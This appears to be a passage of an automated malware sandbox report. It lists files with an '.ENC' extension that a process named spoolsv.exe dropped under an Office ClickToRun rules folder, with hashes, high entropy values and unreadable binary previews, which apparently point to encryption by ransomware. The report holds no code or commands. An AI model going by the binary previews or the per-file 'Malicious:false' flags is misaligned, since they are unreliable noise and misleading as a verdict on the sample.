                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t......e...v...b.r.;.[4.-.8J.....O[..Z...U...H.'.:....e...T:aG.t.<6K.(.V?X...V.d....p2..n}.`.V..........$..).:)......F...E'...........q{|..8/.D2.*..SN.R,....;|Xd..q).e_x9v..q..c...D..#.j...MG.IM...J._`s.X..G...b....y..C..n.4......H.......cQ.m....w.+.V.....y...P...a.w..`..........7.}.ad.*......n.h9..*.+!.{R.v.>h.V..<2.w...3...!.M0. .l..F.i.H..UGN..J..sw.Wf..#....$..[.....>i._..RQ.^....;.:.......G.^..@...YKhmIgM.Y.+#.l>.....1.X.3:..|.~..i..hKzyw..$0R...U.Y..N.9...t.j..Z.HU.s.r..l..E.-...1.&.bG..g...>.:..M...&.F.)..4>..U.%....t..)p./....E.O.~ .#.]...U..~.C.\7..Ei..DE.....+.2S+.F-.9..o.F...%..#..jh.O4..L..T..I7P...$.$.:..B...)...'...g|.S.v~.9.x..a.H.\.D..|.K+#....8.../.W..S..]..!.#|..R.q+...*...-h.G......L$t...nx....D[.K..+ ...W.&.R.......r.....0..L8.|.[E..2.'=\...2.e.%z..n.R..Xr...&..g.I%14_.B......3=ykC0.f9...4.....KBH<.........^e...........`...[.:4..."....)....C.*......H...g..c.|....CF..+.&.M..>.{.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703751v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1440
                                                                                                                                                                                                                                                      Entropy (8bit):7.873299465135535
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/1xI/T+MiCoA+KM/sekEKMa/Aj/6KEMBP3WXKsxw4LZOkMmyR0W9CQa2nETYVJwH:/1xI7iKTeYL/Aj/6KEfKWwuZ3Mv/CmVg
                                                                                                                                                                                                                                                      MD5:0EC5C8422BDC63877FD78C2A46941A66
                                                                                                                                                                                                                                                      SHA1:21E25060C7B62375BDE8CAF0CAFB05082AB4C768
                                                                                                                                                                                                                                                      SHA-256:014EBAA76D0BF8EC090E3A907669B2D7700B5DE8AA06DC217ADE2E3744BB400B
                                                                                                                                                                                                                                                      SHA-512:79A066BE4C244043A0F02ECC856D74D7BCE71182F5F40AB5A61DECD573339AEF2C8A37DDC9590DC12F094120F72D270F237BDA6D1370BBD702E3FB7CE873863B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..l........c...@...X..R......hT...F_g.\....r..3...<....&.........l.M.V..).c. .K....U~+.B.\...[...&YU.d4../.0.b:*..'..r.........I.>.~A......NT.>5...>.....Wq07..k.~.x....H1.0!......i+......|.qG.,._.Cm.D{#..T.q....i./..!XC...f.LT...".....eO.G.9a......C......X*..D....<....r#.{.M..s.Ff..-. .a......e...<.5y.<;2.RD.NO9.b.[...d...*!vE.R....8...N{..J.fc"..ON..W..K|...7U........E..o{....+.T.. ...6..p.&.Q&.+.n.......8J....8....]D....U....G;&\...$.....*.f.|._.....<c.3....Ip+G...9...$..Y..E....3.i.<2./D.IQ.tK[.'....4b.....N\w.....[... ...p..M..K.].o.4..(..F.|...P+..oS..nhq..m..sg..I.9L)n=..w...i..H...l.w..lQ)q......P.C......./+..D.2......?u|^....hsW....xT..G...K|R.LI........b.......1a8q.@..E/....KP...-.$WN....q.S..S.<. .S........:..:.......:.|C..b...\.u...*.......2`pVTZ.?4.6JC......g.D.Si....M./R....8J..EL..}@.l..X...^..`ZU2R.t.!.Q...i+..../0..&K,vDo.^..%. ....O...~-.~...i.B7......FlK....K.....]%.0...A

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703800v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1392
                                                                                                                                                                                                                                                      Entropy (8bit):7.839769058837223
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/aXPHbyhtbQZl970+CW/xBSEfOe9eQNZ18HIwXZOz5WUY97ch14uEOMuw+ROd6VS:/aDyhNe970+CgxPfzePIzWP97c+OMMRM
                                                                                                                                                                                                                                                      MD5:3B4F889FE2E3B9DA879C054A63C416DD
                                                                                                                                                                                                                                                      SHA1:A5F09CA7B701A2BA1BB0095DF4BC85E7696BF630
                                                                                                                                                                                                                                                      SHA-256:52475BCE197ED3F47ADA05016E2EFC4F4982D55607EAD5048915FD84D6B9FBE8
                                                                                                                                                                                                                                                      SHA-512:EEC3BF622549042A8BE46B8D5BD4485D654FA6A9AE6822D32BD0391D3377425A902ABF9E3FD30D5B517BEFD90DCA11F951BB89A98D573B3480BEF706F154FDB4
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..l...l.r.A.....nR.0'..7....m.>._4.b.....Y..D.....a(bcL..b...H.I{>.TDI.'.J...n.!..|..0$.............6.!...3o.V...Z{..6.*.N...\y.!...V.....7u.t...."...yP>.K.......M..E.M. ........DaX.i.. &6V..p....G...O;.=..D..Z=..[..........s..BJb..urZ..r...`*.^.2:...0....#...v.g..N..........m...!..1.e.....`su.`..).i...P..%)."I.......A..U.........^Y/..INx...tB..jB..1...J.....!1N.y}H..1.K...m.`..<.Z}?.|7H.ju.9M....~.....r.y....o.......4..........F.....X.F.......8.ar.C...EW3..ub.^r.>....5m9.....Z.8...PCg..A/....b...}.x...2>.r....8J.c/O...i3.E..R....a.....q.#._..@C....^.,1..{....t.C...`.......ia"..`.....2..E.#.1....!).H...Ggqk.L.oW.Q..o.r....^]..>.S..."..<W.[n.....R.X.....Y.`.n.....-<we.=.E...L.X+....PeYu&u..*Z'K..!W8E..O$Z.`.`..%<.....v.....7c....U$Ss....H....1_C..q..1..WIg.K...M..V.......2..C......g<.Y..'K.z..k8.7..+.[.#.O.,.....%....,.K.>~.*...o.t...`n.$.i3........).[Dn.|X..B.G. J...#GN.ju...;

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703801v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1424
                                                                                                                                                                                                                                                      Entropy (8bit):7.8608095113141685
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/tkHHecEXiZqLcVC5T8NLaOdcjZi97eGpZ5GayIn6es3MFm72UK9VfOuzB4Y0:/+ecEXMwck5QNaMcde7eiGRqIMQ7xuNU
                                                                                                                                                                                                                                                      MD5:ABB336847CFD2D96388C04A00AA67E02
                                                                                                                                                                                                                                                      SHA1:7DF12198F252C2D3FDBC7D075945F5078697A2C4
                                                                                                                                                                                                                                                      SHA-256:60FCA1737295809EDD540E51ADEEB3011E8D8590E3717F19EAD9D08882F58969
                                                                                                                                                                                                                                                      SHA-512:9113FB411E8744BBE3D5AE8A29F5733E3424817A47B050539FB29D1DC8BF1716EF243D129E9D011243A43FAB66E14E9BCA4DBFE22B3BEBB1F34E405A6A2683C4
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t....3..6...0.l..>..r.!Ga..& ...B.a.....{.="....bJ}qf...a.Zj.!vx../.....T..M..a..Z=le....4G...........5x...k.g...=.N2r...*Y...>........'..&.iD...Eo.....r.e7..o..7.;..../..6$....C.~...x&=...<q...D.Sxra.....-.5>.^...^.9....{&.Z..'.....2.a...=..%......Z.......g`..?...5rnJ&\.'..%..=.I......DU....3..p..AE...>.v..... 7...l.\.....O.0.^<.\...OP..\.3.o...|...)X.......r&.....#..B..."w&.4L...^.........!ShC./..mL=(.4...:.kk..@z*R.j.....*..E.:..BkVy.(...;..v..G._..C{.&...Wo......4...I.o..Ho!.m..O.V....c......Pt....%...........'....:.{...Y.........Q.....l..*...~..-m6*.>N.._F.@.-.....F....0...g.Te..a.7.Cso...j&..kz..iK.9..@..."".t)...fO..\...._..B..F..=v@.$.....u.R.LL.....H.!./l.{...........`.`x9.b2.!?4<.1....|....p..od.E'j..Rt.8..E3...?.jc.1`.....^......z.@j.8L&e.E ..y..w....a..IJR..b.W.r.. b".\0E.'.r.I.Th%G.2.2y6Q.1%V/...A.6...N.XOZ.o.d....... ..CU.t...k...J.,@-.F.;....=.H&.H."{R..q.........7....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703850v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.895732025899363
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/M1dF8uPXMl/9RPTCJur/Sp+55ak5VgZ665cHMwtMtxrLIQqAzOclQHC2Aw3+klT:/ydPXWH7C4r/C85ak5VgZRcHZtu6KlQV
                                                                                                                                                                                                                                                      MD5:36C3480EF063A6E1CB09D8EBBF1D2B6E
                                                                                                                                                                                                                                                      SHA1:5A9C01A8AD016BD1C0FCEB70A52C54FA814C3EAC
                                                                                                                                                                                                                                                      SHA-256:52DD1FFA01EA69E63C67A774BF19BAC8ECE380FC58835DD567ECC94287B7D742
                                                                                                                                                                                                                                                      SHA-512:662EC056CBB19287BCBDE1D7A9B81C828C6FB6FF9123C3A58BB4BF0309A55B4A10892D18205F49248022D5A23D95D274D705B9DBC9B168BD8D03794CDA65C4F9
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t....vIB..(.......C.E..*.....Ov{.[..P...^.S..v}...{...0.IN..&..E..G8=l.<9..r. v..G.....D.w.M.....a.r.y....U..Q I..>.j{..*>..-d.%Non~...G.f.....z..T.....U...R5..&...+.t..i.{.pjb).T88.v...7"..jq7n$J..._.....T....q....AHj.^^..lhR...}(..W.x....m.].(....R.}...-%.. ...[T..7.5+a...5...v.....pP.on..8....`..VD.,.lU...G...b...]$.....e.8..\..1Q?.=E.E$/..\....x.u...Z.}..f2w.p.C.AKPG..Y.&...C.y..........$@....'..O`B._M....O.`Q.|m.O...1.u..Mii)....$.'.m.M. .-...P... .)...<.q..".#=......,_....0...1+e.)....P.C....5k..%.]....|.....c.Y..e.T\..!,.s...:.m..M!6.... ]...*)E...Y......w_..QU..v...][.b.H;S.%.W......6~..g.........B5_k.=..n...=...H.q K..=.i....${.b.....*..O4T@qB.....$...<...d.....N0..=.....Y...\<F.p.....)...I'3_yfz.....u..`3.98.w&........m..}........J..:b..^..-w8@J.....4..*..+.Jb.,d./.c.+...5.D.X.Y\..c....x..9..ij4D].V...16.Y..X.\-.5.....(}V.V.ro...9^.V...6.....|C.>...........[Mt..k.w0.b..Z...o.p...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703851v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1456
                                                                                                                                                                                                                                                      Entropy (8bit):7.849712864755424
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/q8/ZkW+Pkg1RWe+3iN8iSnNkYTdwRUnoRMWJ0phDk09Ef9m7gsmEm6R6hlzSrIR:/qHIg3WBAIdwRUoRWLDk09G9OlulzSc3
                                                                                                                                                                                                                                                      MD5:11D3056609F93DDC75976768AC1D09A4
                                                                                                                                                                                                                                                      SHA1:58371EBC32CECD2A6790D7AE44B5AE9A1ED274E4
                                                                                                                                                                                                                                                      SHA-256:2ABA2F79C900CE788BCA7E62A7E3CB2174A3E0C218431DC127A6BEAF8FA96B7C
                                                                                                                                                                                                                                                      SHA-512:27904213F7B72595DC70D20DA4BB055F5C63B0DDB96921796F6979D4DF3AB9C2D64D06537CBB910AE19D70660EFDC62E2840A0A75ABDD33FB7089C877078C3E5
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..I.....{.G...XsF.\.......w.Dw/._..;.....51W.M|Q.G{......|e1.k;.uq...G...a.U..K%..r.!Yp.z.z#....I...|..V.F.qHk..!....hnd..p`X9n...Cx.V.....:}..Q$.j$e....V....k..........P...<.S%q2B.#.!eF.k.F-">.A.v.|wH..x.K...Rx...46...<7..a "......t......H+8....o...corl....{.E.b...f..[1......!...%y.%K.5`.....a....)..z!W...Y.G..b...p,...p.p.U../..X....w.z.E..}.8..GWo.U...WM.&...W.'../.W&\n.|.X!..kl..{.....%uy.{.J....VuW.3.:?.V../.*.7....C..B#.x.~....b.A..)Zq.... hi..:.Vj.....re.......`.&.|..0\].l..w.b7..Mx.......r...WC.j....#....k*..-.\.......|..r....rca......o..v.6QT...K"....;..-._.E.8./....z..f.J....*..@.U~qs....C..0..K.k...HD]....A..R....w.H.....%.X.a.........sf..6S..G....kP.rfVJ....e........O..I....).bT.Cg8..sq.$..U..'...rDw.q....Y..*..x..\..:.@!.GG...c..&.s..G...N~..C...Q....0..E.t...e!B..S.w........*.Q.m...b...-.q......]*..%..M.@.......G...]......7.Z...4V.@..s..1..=e.l.,/.S.*..-=...k...-...8..g.EE...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703900v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1392
                                                                                                                                                                                                                                                      Entropy (8bit):7.85542062917873
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/cejW9ehrEkBrXDaThZKjsyvv8h9IBYYINWYd9hSieadq5mVrIdGqD170o:/7jW9MZBvwich2jIkYdfSJSEdG4b
                                                                                                                                                                                                                                                      MD5:227C05FD136D3CEF3D16C0E3C6AA74E4
                                                                                                                                                                                                                                                      SHA1:CBE0679286E8994E9F9D01CA66BA913092383C96
                                                                                                                                                                                                                                                      SHA-256:F7150E8DA77868303BA68B5CD0E95AF90ED6757C518880C32BB938FEC1058C82
                                                                                                                                                                                                                                                      SHA-512:07DF5AFE0DDA6AA39FFC40EA3EDD1C36D6AEF06DF3103C15B2CBBE744019022258DB140311CB2613F15836C26CE3A4047AE1EF8FC7BCB9F5AA8931D1FFB7443B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t...q}....:....].D@...O..f...r..vJLg....VU..e6D.YUS.gq...3.FP.q.+m..~|.).i_..6!.>.H..].L.[...V.e.I.....x.H..+.....3[:.w.y.z-|>.w...J.-...J)..M-. ^.....rF.\.n:.d<.5......o.lD.O...^.,?.....4...'J...#....-...j...T..~O.. .........q...b..c......$n.*.......3z=...;.D. .L........f.U[\..5..p5.n..e..}.W/.....\}4...2.7\..........y.(....Ty`lH,a\*OJ{.}[.E3......h.......ic.o.zB?.{]..:.~..dqsg%....O7...dd.V..9..=E.-...SGl)..4.W......lcFi?.+i.?..#w&.R.l_`s.>.B.:j...-.2*..^.B....dB...3..'.Cs..N..y.9D..(U..b...QX..4....U.9.uy.=..1l.X.&.w.a....(g.\.>.f....s... 1.Zl.3.7."6).Q.\.7..}......-.{.hIB......D+.....6p.qnH.M....9......5....D..\Rk..O>...rF..'.....].-.$...}1.\.4 EL..5..9N.m.1.Eq..>..?.m..2m.v0p$.....;...\G...e1......,.c.X.Pa..)d../...=.w...i6.a?pn*...%..G.]....tug...E..O.Z_...-.~E.WE...=.......... {.^..&S....c;&..?..1...R"S._y.g|..z..@>.\.f.8...D{Y...-.......G..E...%.#..P.7.}..Y...L..:...t

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703901v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1440
                                                                                                                                                                                                                                                      Entropy (8bit):7.848990177385993
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/autR4IEhBcbswyAMDrucbETx5sRpaTKcDd++0O1WcU3UiNc5wI9m8mqICbGQNtG:/71yrbQx5sRpaVo+IcEdNc56BqIOGkY3
                                                                                                                                                                                                                                                      MD5:FC0778EEF0906E16018C8BFCB776EDDF
                                                                                                                                                                                                                                                      SHA1:EFBF06121916A73AEE80659BC222E8A249781FEF
                                                                                                                                                                                                                                                      SHA-256:6E90FA35AD75DED0109D20BB6E1C185DE3A220AC90F8FBCBFD7F4C9A8F3F1AC6
                                                                                                                                                                                                                                                      SHA-512:15A7BCD410B3FA9FDDAC762C6E471F0E424224392F1D861DC0EF95E56628646DB7CB854F6420CC11B75E157CCC47A8061DB212285DD8B8D2C4C85B49E1156BE6
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.l.$l8.....j.P?.:<.'...ek...TY.......{.x|..c.....}V.'...6s.H...o.fJ..u\..{l....\..Qv.H^.@.!..X.k.O..kNH.....}...!.O.>.Q..b.E_......$>........D....LK..p..R r=....-...T.H.k....o.|.P....2.Wy....U.a..,.!..s..X...qG.\.......g....x..).c..e.(.i...p.P.}J[..y..b.d^......I...O..xE..k,..,.....;.&vP.R..G..O.Sf.&...~.C<Q=D.....q........$..+R.P_i.5md...]..K$y.....GRk..Ak.z1.S(.......{O...I..k..d.l...Q..a..`..+%.G...S*..`..>..'..GO...$...8,...D...W...9.............S...........Z..._. ..m....c.. ?.]y..Q.....0.....=..~D3s..(4...A..*.......J+.p...'.I..bM.0.....<I...M..@.U...ECt.q>...H'.y....,.............._......J%i...5.!....,rj1...V:i..I...3..j.$....KOn..c.m*.<GM.....k..[.>g.I.7u....<R>.f...:iSQ....l.....M.F.A..j`...%g.!..^*Zz..D..*.LN.X].p.y3.x..>.a....KB......imX.&h.x.7...,..n.O.k..m.]z....!..y.O.a..<.......w[Y..._|.s.7.........@.9.m...fo.IF;U.{.E..t.!.....T...I`.Q....^....,...D...M.m8*.~'}.z.J

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703950v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.86643955787867
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/d7oPYfikqu7t40c+vSw5uhLf+805Utgne0grdi3I51K6xv+/hodyk49/Z:/d5txKQch7+8029r03+1K6lugyk6/Z
                                                                                                                                                                                                                                                      MD5:80FBD3E79613BC2C7980E849722899F9
                                                                                                                                                                                                                                                      SHA1:C54D0257A1B9BBC7D1FC4C580F405C9D434B498C
                                                                                                                                                                                                                                                      SHA-256:D0DCE076CA5BAF164DC285295EF0E11DB0E5F131031C44CF7BB22F356ACE1ABF
                                                                                                                                                                                                                                                      SHA-512:1FCB7E02EF692B70EB93B4D3F4D23BE74EA915173140125062FDA06BF54BF213E7D3E3ED9E00084337F733441D58FA7A6A43BB4D7093ED3A77EA2F0BEF6E6463
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t...QL..^. .s.sw]~./.s,k.......M"..%4.Ha..'a...k.m..e"u....2.M.I%Iz...^_.z'.......mH}..E.l......y...,.^.R.Z...s.....;...)..a..;...../z...B.7..<D<.Q...O...%.3F.KW...,X.,...hT/.......w.t....<r.....].v...lP..O...F... ..Y..Z(LNT_..Wj.w1.M..>p.....'...\.....p.....q.S.....`.E.,S..0?FH..D..?=R...0.9.H.f.4<..4.E.. ....7.k.?n3.....!^,..Z.8.........4.+ay..r....O.:.........5...7....KE...X..4..~..G....e.F..#4-....'..........m.V..=m......#.....-V=..lu....BC..X.s.C....N|(:.a...>...1..}.7N2v..1m..?.R..#.Sef..d..`tXu{u{S........(s..`.fX...c.f..dy....E.82p.....m.R.EG0...K8&..SZ;..f.Z...Z.z......ae,.?...E%......<0~..B`.w..F.*r|.n...mzu)..d..Ru.n.#g.-.yg1X..$.z.~.M..7ON;.. ..4r.8xiM`......../xZ../..r.....g....1Z<.{U.oUi.....x...hs^|#..?T.=......K.3.........o8.\.+(...U...w.h....P||....B19G.....xA..) .R...=5.V_...D..j.B..g..^W.7s..td.|......O......G1..;U..z.ED....P...X.jy .2.".Q...T..~U.OZ.[+..e.N....I.G..'l....a

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703951v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.85385375883013
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/8XkpJpHTECPDBOrioN6ptkpIPiUxdIyVPcjFxqd8RBNxri3fT:/8XkpJpHTECALN66IjIy6qyFQT
                                                                                                                                                                                                                                                      MD5:9528FA9939CBA5BBFCD78A38EA5ECEC7
                                                                                                                                                                                                                                                      SHA1:E74B5A81F6697CD4F92CDCD290B8D6117FC2D2FE
                                                                                                                                                                                                                                                      SHA-256:FFEDC4295261385C14396E2C78931667D4653B73E4C8B3E443D0909BAFE91F87
                                                                                                                                                                                                                                                      SHA-512:12BB08B9DDFB0F109A70C4BD4AB3F590BFC6F12AC3376084914ACCCADAEB56DA9F4E96EB999D6D17E95A9638CEB1D1DE44681D55FB4811C12B8695524731EB86
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t....._.o...|..f|.x)*..<...<..jZ..U.C+...q......i..m.,..h...y.ge[.]l..$!v.,.B+..... .....*.c....#./,r.......7.P..*....y.-.w.M.k.yQ....Z.l$nw~*.q_.M/...,.k...].Y.....Y.exk$..{.......hW...H.S.D..Tw.0....`.|.5.o>..{.'.l..4]...z.=... .......E9...Q*.._....{.>{..O.$..d...d.ER..T..._.{...4..9Q..Fn.U.9.|. ........ S....Ci1g.?../.Q...8{&x...'oU..}k.l..C.....r3.d.!........`........s4.$...g.[&4.|..4..qK.,.N3F<.:..."...eE#...H....Q...i..z.X.X...R.D...ZeI[.........S.![n...6Tg$..:l.]:=.Y..#.z.h..[CL....h.$%...m'...%;...H.c.d.&...Bn>e..B.zV..B..,....~G<......Y..[s...+.....R......g......w.0...u..GZ.b.......C]8r...R.m..2..-4%E..<.....y.|..9D....F.+jN..&.........+{hG@.^.j.B.....-....y........Za.LY..BO.R%)...6.'...DrI.....*. HW.g.[ .Y7.......1....G.@..*{b.&!..}..<"f.|......K.....?.G.d{a.>K..MS..b....E.. <..E.^...zcz........NM..45.....b. .....j.,upn.=..f....W.I..4z..uj.L...%..W.....8.h.7..^.=HI.L.d.......n...Y

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule704000v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1392
                                                                                                                                                                                                                                                      Entropy (8bit):7.869982975459658
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/Ejbus1Ewj3M+14Bmiu0+oLx3kzjmyNdjgrUCWskfujiZt0EfCY6TXEch58rDaI:/e1Eih14BmiuFodUzjmOdOJk2iZWEfOK
                                                                                                                                                                                                                                                      MD5:B361467E10B4DB39DD6B2C8A4775729E
                                                                                                                                                                                                                                                      SHA1:3689070BD97C23D72C02DB31C536862FE6879621
                                                                                                                                                                                                                                                      SHA-256:2C6F0275890738B9D4A2BBD5329CED1F348910C26B09931E928B49C9A22604F9
                                                                                                                                                                                                                                                      SHA-512:A40630F8E2BB5530158EE33576E0D3C8C2AB37F7D33B553D3DEA8B3789B2E24918E28F34D8C3A1D19D170A0C3E5C581472411856317F8D5E7672ED56AEF706AB
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.h..8_..5|..e8....Ql...'..#..[..K.a.........T.9D...D ..lH.C>.Ev...._b..g....-'.......fw.s.J......Z....0lA..L...8.).....?..h ..w..xM..!..N..Q%x....t..g.pD....y...u.X..........[..._..*y...~.%y..=\6.9:.n..._.5T.'q..xu7.....N.k.;....`.Z.K......{m....h....:S........I.j6o4M..qn....5.9....7./.-.OT2".g......9G.Gy.............#..5T.a1..9.;.c..MR......lCg\.j.y..U..s.${..5....V..........H.^.e......2V.........!l.+a.i......j....F.......'.q!...L...?....,'&..Y...<..B...+Ir......c.#vQj...jT..g.{.....:..k...C../........C.kh....b...D...i.\.....i...T$......C...d...AZ.p..L\KO..[...:.X..;*......A...PA.....(....p1&.K.a.c..l%Z_..d..Z5....h..;...dS..5.(..XP&..E!....t.........LW.C_....~V_^..5c..NL.....@..n\[y4......Oz.r:.].l.... ..........'.=.m...w ....:......d....O..6=.P.....c.<l$'&..G...%E..~@T...t.......(.1.'*..W...(.f..:."..f:}xI_Z.n..U.aU..^6.J..W..v.. .c...s_m.%*.9.gp........'E.9.8...I..*B.v....)-K..o...D.....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule704001v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1424
                                                                                                                                                                                                                                                      Entropy (8bit):7.869804051765934
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/F9g61YGL693/naqKR5UHN+AndvVbH45xb8UhapasdY9I9YyOYZuv0w://g6BL6ZaqoCN++d9bY5xb1s9dmI9FOp
                                                                                                                                                                                                                                                      MD5:86A959CC86BF16FAA518F6C91BC9FFDC
                                                                                                                                                                                                                                                      SHA1:62EBF8AE0291639868D4B8B64E018A04ED5C2854
                                                                                                                                                                                                                                                      SHA-256:0B8926A3B5D45BF76FF99D7C5D440A7C8283DF8C5413A2E84157014630C6C70E
                                                                                                                                                                                                                                                      SHA-512:ABC68BC35F2123ABD907D2ADFCC97B8612A5C8DEF10BC7984A17C9F8DE999E4B0F91721BD5F3F3B07BEC5769BE3361AC88AC545F5DFE54D187761A9A82DEAC70
                                                                                                                                                                                                                                                      Malicious:false
